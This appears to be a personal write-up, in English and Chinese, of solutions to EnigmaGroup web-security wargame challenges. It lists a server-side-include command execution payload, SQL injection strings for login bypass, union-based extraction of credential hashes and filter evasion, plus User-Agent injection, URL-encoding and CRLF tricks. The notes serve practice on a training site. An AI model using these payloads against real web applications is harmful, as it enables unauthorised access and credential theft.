CHALLENGES :http://www.enigmagroup.org/
1. Basic Skills
    Miscellaneous:
       Misc. 1 - Header Injections : 
          You can find the password in response, the last char is "=" and it means the
          password was encoded in base64, just decoded it.
       Misc. 2 - Server Side Includes :
          http://en.wikipedia.org/wiki/Server_Side_Includes : input <!--#exec cmd="ls -l" --> ,
	  the server will execute cmd and list all the files in current directory, you will find
	  a file names "password", use password in this file login the AdminPage , the name is "admin"
      Misc. 3 - Regexp Skills:
	var reg = new RegExp("^[A-Za-z0-9]{5}");  # 检查开头的5个字符是否是字母或者数字  
	reg = new RegExp("^[^e-z0-9A-Z]+[^A-Z]{4}{?[a-z]*_?");
	reg = new RegExp("^[A9FbdHh5]+[T]*.{2}_?[a-z]+");
	reg = new RegExp("^[^YdSeu][r]+[^r]+=?_?[aeiou]+[^pstuvwxyz]+");
	reg = new RegExp("^(c|a|b|d)+[^A-Za-df-qs-z]{2}{?[^vCXBhq]*[^pqrst]*[a]+[^passwd]*}?");
	reg = new RegExp("^.*[k0pst]$");
	reg = new RegExp("^[^0-9A-Z]{5}$");

    SQL Injection:
       sql1: 
            填入：#######' or '1'='1'-- ：成功
            若填入：#######' or 'a'='a'--：不会成功

       sql2: 重点注意尝试交换查询语句中列名的排列顺序，会获取不同的数据
            猜测用户表名为users，利用order by来确定表的列数
            union select 1,2,3 from users order by 3--  users表有三列，猜测列名为username
            尝试：union select username,2,3 from users--  没有发现有用信息
                  union select 2,username,3 from users--  输出administrator
            猜测另一个列名为password
                  union select 2,username,password from users-- 输出：haZed  4442eaef72feac05644a2a01363c45e2
                  union select 10 password,username from users-- 输出：6537d34fd1c080b5cb7f06dde3a26fe8  administrator
            MD5解密就可以获得密码：bl1nd

            通过information_schema获取表名和列名，但是一般会被过滤，下面是一些反过滤措施（但在这个关卡中没有成功绕过）：
            /*!union%20select*/%201,2,3,4,5,6,7,8%20%20/*!FrOm*/%20information_/*!schema*/./*!tABlEs*/--

            /*!union%20select*/%201,2,3,4,5,6,7,8%20%20/*!FrOm*/%20/*!@69nformation_schema.tables*/--

            /*!union*/%20select%201,2,3,/*!convert*/(column_name%20using%20latin1)%20from%20/*!@69nformation_schema*//*!.columns*/%20where%20table_name="users"--

            and%20substring(@@version,1,1)=4

        sql3: 绕过filter：
            /*!union*/ select 10,username,password from users-- ：输出administrator  6cfdca6f9633968c72a2a6e0fe2756ca（这个加了两次密）
            解密后密码：asdfgh
            

        sql4: User agent SQL injection
            修改 User Agent字段：
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 AAA' or 1-- 
            提交出现错误：
            Could not successfully run query (INSERT INTO SQL4logs (ipaddress, useragent) VALUES(119.80.202.204, Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 AAA' or 1--) from DB: 

            继续修改：User-Agent: (select * from /*!information_sechma*/)
            返回错误：Looking at the information_schema table is forbidden; however, if we did allow you, you could have found the tablename SQL4users.



URL Manipulation:
         URL1: 随便填写一个，然后触发错误：
                       Error finding aaa in password.php
               修改url为：http://www.enigmagroup.org/missions/basics/um/1/index.php?file=password.php
                       出现： administrator:c440b4

         URL2: 对于url: http://www.enigmagroup.org/missions/basics/um/2/%27 
               直接使用会把%27解析为'，因此需要对%27进行URL编码，得到%2527
               最终URL：http://www.enigmagroup.org/missions/basics/um/2/%2527

         URL3: 根据题目可知服务端接收一个参数：url。因此请求的URL应该为：
               http://www.enigmagroup.org/missions/basics/um/3/splitme.php?url=split%0D%0Ame.php


Reconnaissance
        Reconnaissance 2 - PHP Version :
        利用PHP Easter Egg可以发现PHP版本，使用下面的URL:
        http://www.enigmagroup.org/missions/basics/recon/2/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
        